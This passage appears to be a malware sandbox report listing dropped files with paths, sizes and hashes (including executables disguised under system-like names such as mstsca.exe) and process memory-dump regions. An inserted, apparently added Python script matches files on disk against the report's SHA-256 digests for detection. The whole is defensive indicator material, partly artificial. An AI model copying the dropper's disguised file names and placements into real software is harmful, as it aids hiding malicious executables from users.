                                    3295dcac0b79ccd328103f1e723fc1a776084d7c00748f62d518d8807e107528cc71e918f398c0dd58603200ff4695694724e6290c2fdeeae6697fad2bf3fee7

                                  • C:\Users\Admin\AppData\Local\Temp\Player3.exe

                                    Filesize

                                    244KB

                                    MD5

                                    43a3e1c9723e124a9b495cd474a05dcb

                                    SHA1

                                    d293f427eaa8efc18bb8929a9f54fb61e03bdd89

                                    SHA256

                                    619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab

                                    SHA512

                                    6717d6be0f25d66ba3689b703b9f1360c172138faa0172168c531f55eb217050c03a41396b7a440e899974d71c2f42b41d07db0ef97751c420facfae1550bfa7

                                  • C:\Users\Admin\AppData\Local\Temp\Wtoahoepfise.dll

                                    Filesize

                                    3.2MB

                                    MD5

                                    4f2a3cefb67e87b1f2eaa266e498ae56

                                    SHA1

                                    d8c13c9db663969f961dba37cf1caafe3f5e8b6b

                                    SHA256

                                    74f44c6e8af4d6142286c4b80e7872b0fba0edad636a9796908e623472d04f08

                                    SHA512

                                    3fba357c19d1f35ba60ae66185ae87b7908f4c007b9228d635372ac20256565708c7025494ad9cc4675ee7697f2e0c8e862447cfad1b3fe6676de76080627e3a

                                  • C:\Users\Admin\AppData\Local\Temp\db.dat

                                    Filesize

                                    557KB

                                    MD5

                                    ee5d452cc4ee71e1f544582bf6fca143

                                    SHA1

                                    a193952075b2b4a83759098754e814a931b8ba90

                                    SHA256

                                    f5cb9476e4b5576bb94eae1d278093b6470b0238226d4c05ec8c76747d57cbfe

                                    SHA512

                                    7a935ae3df65b949c5e7f1ed93bd2173165ef4e347ceb5879725fbb995aedeef853b5b1dc4c4155d423f34d004f8a0df59258cefdad5f49e617d0a74764c896b

                                  • C:\Users\Admin\AppData\Local\Temp\db.dll

                                    Filesize

                                    52KB

                                    MD5

                                    1b20e998d058e813dfc515867d31124f

                                    SHA1

                                    c9dc9c42a748af18ae1a8c882b90a2b9e3313e6f

                                    SHA256

                                    24a53033a2e89acf65f6a5e60d35cb223585817032635e81bf31264eb7dabd00

                                    SHA512

                                    79849fbdb9a9e7f7684b570d14662448b093b8aa2b23dfd95856db3a78faf75a95d95c51b8aa8506c4fbecffebcc57cd153dda38c830c05b8cd38629fae673c6

                                  • C:\Users\Admin\AppData\Local\Temp\ss31.exe

                                    Filesize

                                    950KB

                                    MD5

                                    2c29457ffd728428540c91aec6b22cc3

                                    SHA1

                                    8de27d76e9b04e92af69202b0f0bdafd9f3aff61

                                    SHA256

                                    97af1eceb6079f69333105e7fda2c391bad555f78946901748480e26ec29a871

                                    SHA512

                                    964da7908a578df6a342a5bf58be55b805294d08bcf4578e8fb3a6ad9347dedacb335da3ec2ddfa14cf62a48a416b9d15def1c9c2f6d36f61b5cd0ef09bf00d7

                                  • C:\Users\Admin\AppData\Local\Temp\zyy.exe

                                    Filesize

                                    328KB

                                    MD5

                                    bbaa394e6b0ecb7808722986b90d290c

                                    SHA1

                                    682e835d7ea19c9aa3d464436d673e5c89ab2bb6

                                    SHA256

                                    baa3acf778b3bcf4b7be932384799e8c95a5dc56c0faea8cbf7a33195ab47e73

                                    SHA512

                                    2f3ef8921f36beaedf364d72f01af70aaa16acd3804343a1c5ff4f72b91333b4489d15c33c08b05695b216cbd024fc8783676dd98a907be3af8cb8a56c075f4f

                                  • C:\Users\Admin\AppData\Local\bowsakkdestx.txt

                                    Filesize

                                    563B

                                    MD5

                                    3c66ee468dfa0688e6d22ca20d761140

                                    SHA1

                                    965c713cd69439ee5662125f0390a2324a7859bf

                                    SHA256

                                    4b230d2eaf9e5441f56db135faca2c761001787249d2358133e4f368061a1ea3

                                    SHA512

                                    4b29902d881bf20305322cc6a7bffb312187be86f4efa658a9d3c455e84f9f8b0d07f6f2bb6dac42ac050dc6f8d876e2b9df0ef4d5d1bb7e9be1223d652e04c6

                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

                                    Filesize

                                    9KB

                                    MD5

                                    9ead10c08e72ae41921191f8db39bc16

                                    SHA1

                                    abe3bce01cd34afc88e2c838173f8c2bd0090ae1

                                    SHA256

                                    8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

                                    SHA512

                                    aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

                                  • C:\Users\Admin\AppData\Roaming\dbdwbiw

                                    Filesize

                                    329KB

                                    MD5

                                    545746a5016236cfc019f89f921da346

                                    SHA1

                                    40a1f932374625dc1e703edf1930f5c888eda098

                                    SHA256

                                    253abf08a328cbf2b44f7a9f527b0e05371f4c4fd6b34a9956cee3f03210f444

                                    SHA512

                                    5559885fcc749f34377ccb093c5963f06b733353f20985a6dcb6f93c0ff1a727993b004c4e85e7b876b26f0b1eb4201d4e1bf69ed7c76e9f0c6bae3cf14ecb95

                                  • C:\Users\Admin\AppData\Roaming\gbdwbiw

                                    Filesize

                                    329KB

                                    MD5

                                    6e195bf95f1e6df5c96e31fa17d32c08

                                    SHA1

                                    2052fb8a54d776d48263bf7d7f0c397041108a1a

                                    SHA256

                                    595d22d790f57e4622d9583ae1544af1b2d445a95b760cb6e50f9d4d3b114e30

                                    SHA512

                                    cf1d92fa9ce81df1b69a597bbfc41ac9f522f6931f50a0c0648bb8d5dd53e75830dc3703c91820fd772f429c55336162c5eb248fddde9acb60b0136f1f368fe7

                                  • \Users\Admin\AppData\Local\Temp\Wtoahoepfise.dll

                                    Filesize

                                    3.2MB

                                    MD5

                                    4f2a3cefb67e87b1f2eaa266e498ae56

                                    SHA1

                                    d8c13c9db663969f961dba37cf1caafe3f5e8b6b

                                    SHA256

                                    74f44c6e8af4d6142286c4b80e7872b0fba0edad636a9796908e623472d04f08

                                    SHA512

                                    3fba357c19d1f35ba60ae66185ae87b7908f4c007b9228d635372ac20256565708c7025494ad9cc4675ee7697f2e0c8e862447cfad1b3fe6676de76080627e3a

                                  • \Users\Admin\AppData\Local\Temp\db.dll

                                    Filesize

                                    52KB

                                    MD5

                                    1b20e998d058e813dfc515867d31124f

                                    SHA1

                                    c9dc9c42a748af18ae1a8c882b90a2b9e3313e6f

                                    SHA256

                                    24a53033a2e89acf65f6a5e60d35cb223585817032635e81bf31264eb7dabd00

                                    SHA512

                                    79849fbdb9a9e7f7684b570d14662448b093b8aa2b23dfd95856db3a78faf75a95d95c51b8aa8506c4fbecffebcc57cd153dda38c830c05b8cd38629fae673c6

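The dropped-file list above is most useful as a content-based IOC set: the same binary turns up under several names and paths (db.dll under both C:\Users\... and \Users\..., extensionless copies such as dbdwbiw and gbdwbiw under Roaming), so matching on file name or location misses renamed copies while matching on digest does not. The script below is an added example, not part of the sandbox report or its tooling. The SHA-256 values are transcribed from the entries above; everything else (the single-pass hashing, the directory walk, the sample files in the usage note) is illustrative and assumed.

```python
"""Added example (not from the sandbox report): match files on disk against the
report's dropped-file digests by content, not by name or path."""
import hashlib
import os
import sys
from typing import Callable, Dict, Iterable, List, Optional, Tuple

# SHA-256 digests transcribed from the "Dropped files" entries of the report,
# keyed to the name the sandbox saw the content under. Where the report lists
# the same digest under more than one path, only one entry is kept.
DROPPED_FILE_SHA256: Dict[str, str] = {
    "56041d4fbc7afa0874e80a4f47f37139acc8938cc54fe79657a50c023cf4b94a": "F835.exe",
    "619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab": "Player3.exe",
    "74f44c6e8af4d6142286c4b80e7872b0fba0edad636a9796908e623472d04f08": "Wtoahoepfise.dll",
    "f5cb9476e4b5576bb94eae1d278093b6470b0238226d4c05ec8c76747d57cbfe": "db.dat",
    "24a53033a2e89acf65f6a5e60d35cb223585817032635e81bf31264eb7dabd00": "db.dll",
    "97af1eceb6079f69333105e7fda2c391bad555f78946901748480e26ec29a871": "ss31.exe",
    "baa3acf778b3bcf4b7be932384799e8c95a5dc56c0faea8cbf7a33195ab47e73": "zyy.exe",
    "4b230d2eaf9e5441f56db135faca2c761001787249d2358133e4f368061a1ea3": "bowsakkdestx.txt",
    "8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0": "mstsca.exe",
    "253abf08a328cbf2b44f7a9f527b0e05371f4c4fd6b34a9956cee3f03210f444": "dbdwbiw",
    "595d22d790f57e4622d9583ae1544af1b2d445a95b760cb6e50f9d4d3b114e30": "gbdwbiw",
}

CHUNK = 1 << 20  # read 1 MiB at a time so large droppers are not loaded whole

def hash_stream(chunks: Iterable[bytes]) -> Dict[str, str]:
    """Compute MD5, SHA-1, SHA-256 and SHA-512 in one pass over the data.
    These are the four digests the report lists per dropped file, so the
    result can be compared against any of them."""
    hashers = {name: hashlib.new(name) for name in ("md5", "sha1", "sha256", "sha512")}
    for chunk in chunks:
        for h in hashers.values():
            h.update(chunk)
    return {name: h.hexdigest() for name, h in hashers.items()}

def hash_bytes(data: bytes) -> Dict[str, str]:
    """Digests of an in-memory blob (e.g. a carved or decoded payload)."""
    return hash_stream([data])

def hash_file(path: str) -> Dict[str, str]:
    """Digests of a file on disk, streamed in CHUNK-sized reads."""
    with open(path, "rb") as f:
        return hash_stream(iter(lambda: f.read(CHUNK), b""))

def match_digests(digests: Dict[str, str],
                  ioc: Dict[str, str] = DROPPED_FILE_SHA256) -> Optional[str]:
    """Return the reported name for a digest set, or None if it is unknown.
    Comparison is on SHA-256 only; MD5/SHA-1 are kept for cross-referencing
    other reports, not for matching, since both are collision-prone."""
    return ioc.get(digests["sha256"].lower())

def scan_tree(root: str,
              ioc: Dict[str, str] = DROPPED_FILE_SHA256) -> List[Tuple[str, str, str]]:
    """Walk a directory tree and return (path, reported_name, sha256) for every
    file whose content matches an IOC, whatever it is called on disk."""
    hits: List[Tuple[str, str, str]] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            try:
                digests = hash_file(path)
            except OSError:
                continue  # locked or vanished files are skipped, not fatal
            hit = match_digests(digests, ioc)
            if hit is not None:
                hits.append((path, hit, digests["sha256"]))
    return hits

if __name__ == "__main__":
    # Usage: python ioc_scan.py <directory>; prints one line per content match.
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, reported_name, sha256 in scan_tree(root):
        print(f"{path}\tmatches dropped file {reported_name}\t{sha256}")
```

Run it against a user profile (or a mounted image) and it reports a hit for any file whose bytes match a dropped file, regardless of the name it was given; a copy renamed to something other than the names in the report still matches because only the SHA-256 is compared. The four-digest output is kept so a single hashing pass also yields the MD5 and SHA-1 values that older reports and feeds key on.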
                                  • memory/60-230-0x0000023D1D800000-0x0000023D1D872000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/60-250-0x0000023D1D800000-0x0000023D1D872000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/60-236-0x0000023D1D920000-0x0000023D1D992000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/60-278-0x0000023D1D920000-0x0000023D1D992000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/760-563-0x0000018EC7390000-0x0000018EC749B000-memory.dmp

                                    Filesize

                                    1.0MB

                                  • memory/760-467-0x0000018EC4C60000-0x0000018EC4CD2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/760-226-0x0000018EC4C60000-0x0000018EC4CD2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/760-508-0x0000018EC6690000-0x0000018EC66AB000-memory.dmp

                                    Filesize

                                    108KB

                                  • memory/760-507-0x0000018EC6670000-0x0000018EC6690000-memory.dmp

                                    Filesize

                                    128KB

                                  • memory/760-506-0x0000018EC7390000-0x0000018EC749B000-memory.dmp

                                    Filesize

                                    1.0MB

                                  • memory/760-505-0x0000018EC4CE0000-0x0000018EC4CFB000-memory.dmp

                                    Filesize

                                    108KB

                                  • memory/760-248-0x0000018EC4C60000-0x0000018EC4CD2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1008-120-0x0000000000400000-0x0000000002B02000-memory.dmp

                                    Filesize

                                    39.0MB

                                  • memory/1008-118-0x00000000001F0000-0x00000000001F9000-memory.dmp

                                    Filesize

                                    36KB

                                  • memory/1056-345-0x00000218E4D40000-0x00000218E4DB2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1056-341-0x00000218E4800000-0x00000218E4872000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1132-305-0x000001FC5BD00000-0x000001FC5BD72000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1132-286-0x000001FC5BD00000-0x000001FC5BD72000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1132-290-0x000001FC5BDF0000-0x000001FC5BE62000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1132-337-0x000001FC5BDF0000-0x000001FC5BE62000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1280-396-0x0000024684140000-0x00000246841B2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1280-398-0x0000024684230000-0x00000246842A2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1376-437-0x000001B3BCD60000-0x000001B3BCDD2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1376-401-0x000001B3BCC70000-0x000001B3BCCE2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1456-347-0x00000199CC440000-0x00000199CC4B2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1456-339-0x00000199CC530000-0x00000199CC5A2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1472-152-0x0000000000080000-0x0000000000206000-memory.dmp

                                    Filesize

                                    1.5MB

                                  • memory/1528-134-0x0000000004980000-0x0000000004A9B000-memory.dmp

                                    Filesize

                                    1.1MB

                                  • memory/1864-385-0x00000128C2A40000-0x00000128C2AB2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/1864-389-0x00000128C2AC0000-0x00000128C2B32000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2216-257-0x000001048D850000-0x000001048D8C2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2216-293-0x000001048D850000-0x000001048D8C2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2216-291-0x000001048DDB0000-0x000001048DE22000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2216-255-0x000001048DDB0000-0x000001048DE22000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2232-268-0x00000265F2740000-0x00000265F27B2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2232-270-0x00000265F1D20000-0x00000265F1D92000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2232-296-0x00000265F2740000-0x00000265F27B2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2232-301-0x00000265F1D20000-0x00000265F1D92000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2248-466-0x0000012C20A50000-0x0000012C20B84000-memory.dmp

                                    Filesize

                                    1.2MB

                                  • memory/2248-202-0x0000012C20A50000-0x0000012C20B84000-memory.dmp

                                    Filesize

                                    1.2MB

                                  • memory/2292-146-0x0000000004990000-0x0000000004AAB000-memory.dmp

                                    Filesize

                                    1.1MB

                                  • memory/2396-218-0x0000023E89720000-0x0000023E89792000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2396-210-0x0000023E88DA0000-0x0000023E88DED000-memory.dmp

                                    Filesize

                                    308KB

                                  • memory/2396-219-0x0000023E88FD0000-0x0000023E8901D000-memory.dmp

                                    Filesize

                                    308KB

                                  • memory/2396-245-0x0000023E89720000-0x0000023E89792000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2396-216-0x0000023E89970000-0x0000023E899E2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2396-244-0x0000023E89970000-0x0000023E899E2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2504-442-0x000001E66C970000-0x000001E66C9E2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2504-438-0x000001E66C630000-0x000001E66C6A2000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2564-448-0x00000230FC100000-0x00000230FC172000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2564-447-0x00000230FBED0000-0x00000230FBF42000-memory.dmp

                                    Filesize

                                    456KB

                                  • memory/2576-201-0x0000017E92050000-0x0000017E92184000-memory.dmp

                                    Filesize

                                    1.2MB

                                  • memory/2576-200-0x0000017E91ED0000-0x0000017E92043000-memory.dmp

                                    Filesize

                                    1.4MB

  • memory/2576-465-0x0000017E92050000-0x0000017E92184000-memory.dmp (Filesize 1.2MB)
  • memory/2644-540-0x0000000000400000-0x0000000000537000-memory.dmp (Filesize 1.2MB)
  • memory/2644-343-0x0000000000400000-0x0000000000537000-memory.dmp (Filesize 1.2MB)
  • memory/2808-473-0x0000000000400000-0x0000000000537000-memory.dmp (Filesize 1.2MB)
  • memory/2808-141-0x0000000000400000-0x0000000000537000-memory.dmp (Filesize 1.2MB)
  • memory/2808-136-0x0000000000400000-0x0000000000537000-memory.dmp (Filesize 1.2MB)
  • memory/2808-133-0x0000000000400000-0x0000000000537000-memory.dmp (Filesize 1.2MB)
  • memory/2808-131-0x0000000000400000-0x0000000000537000-memory.dmp (Filesize 1.2MB)
  • memory/3196-119-0x0000000000DE0000-0x0000000000DF6000-memory.dmp (Filesize 88KB)
  • memory/3880-597-0x0000000004D60000-0x000000000509F000-memory.dmp (Filesize 3.2MB)
  • memory/3928-490-0x0000000000400000-0x0000000000537000-memory.dmp (Filesize 1.2MB)
  • memory/3980-483-0x0000000000400000-0x0000000000537000-memory.dmp (Filesize 1.2MB)
  • memory/4164-552-0x0000000000400000-0x0000000000537000-memory.dmp (Filesize 1.2MB)
  • memory/4168-393-0x0000000004710000-0x000000000473E000-memory.dmp (Filesize 184KB)
  • memory/4168-549-0x00000000046F0000-0x00000000046F2000-memory.dmp (Filesize 8KB)
  • memory/4168-550-0x00000000046F0000-0x00000000046F3000-memory.dmp (Filesize 12KB)
  • memory/4168-561-0x0000000004740000-0x000000000475C000-memory.dmp (Filesize 112KB)
  • memory/4168-546-0x0000000004740000-0x000000000475C000-memory.dmp (Filesize 112KB)
  • memory/4412-548-0x0000000004730000-0x000000000474C000-memory.dmp (Filesize 112KB)
  • memory/4524-235-0x0000000004B90000-0x0000000004C92000-memory.dmp (Filesize 1.0MB)
  • memory/4524-428-0x0000000004B10000-0x0000000004B6E000-memory.dmp (Filesize 376KB)
  • memory/4524-241-0x0000000004B10000-0x0000000004B6E000-memory.dmp (Filesize 376KB)
  • memory/4648-142-0x0000000000400000-0x0000000000537000-memory.dmp (Filesize 1.2MB)
  • memory/4648-144-0x0000000000400000-0x0000000000537000-memory.dmp (Filesize 1.2MB)
  • memory/4648-147-0x0000000000400000-0x0000000000537000-memory.dmp (Filesize 1.2MB)
  • memory/4648-482-0x0000000000400000-0x0000000000537000-memory.dmp (Filesize 1.2MB)
  • memory/4648-145-0x0000000000400000-0x0000000000537000-memory.dmp (Filesize 1.2MB)
  • memory/4776-192-0x0000000002B70000-0x0000000002B79000-memory.dmp (Filesize 36KB)
  • memory/5012-562-0x0000000004D60000-0x000000000509F000-memory.dmp (Filesize 3.2MB)
  • memory/5088-436-0x0000000002B60000-0x0000000002B69000-memory.dmp (Filesize 36KB)
  • memory/5100-231-0x0000000004910000-0x0000000004A13000-memory.dmp (Filesize 1.0MB)
  • memory/5100-238-0x0000000004850000-0x00000000048AE000-memory.dmp (Filesize 376KB)
  • memory/5100-427-0x0000000004850000-0x00000000048AE000-memory.dmp (Filesize 376KB)
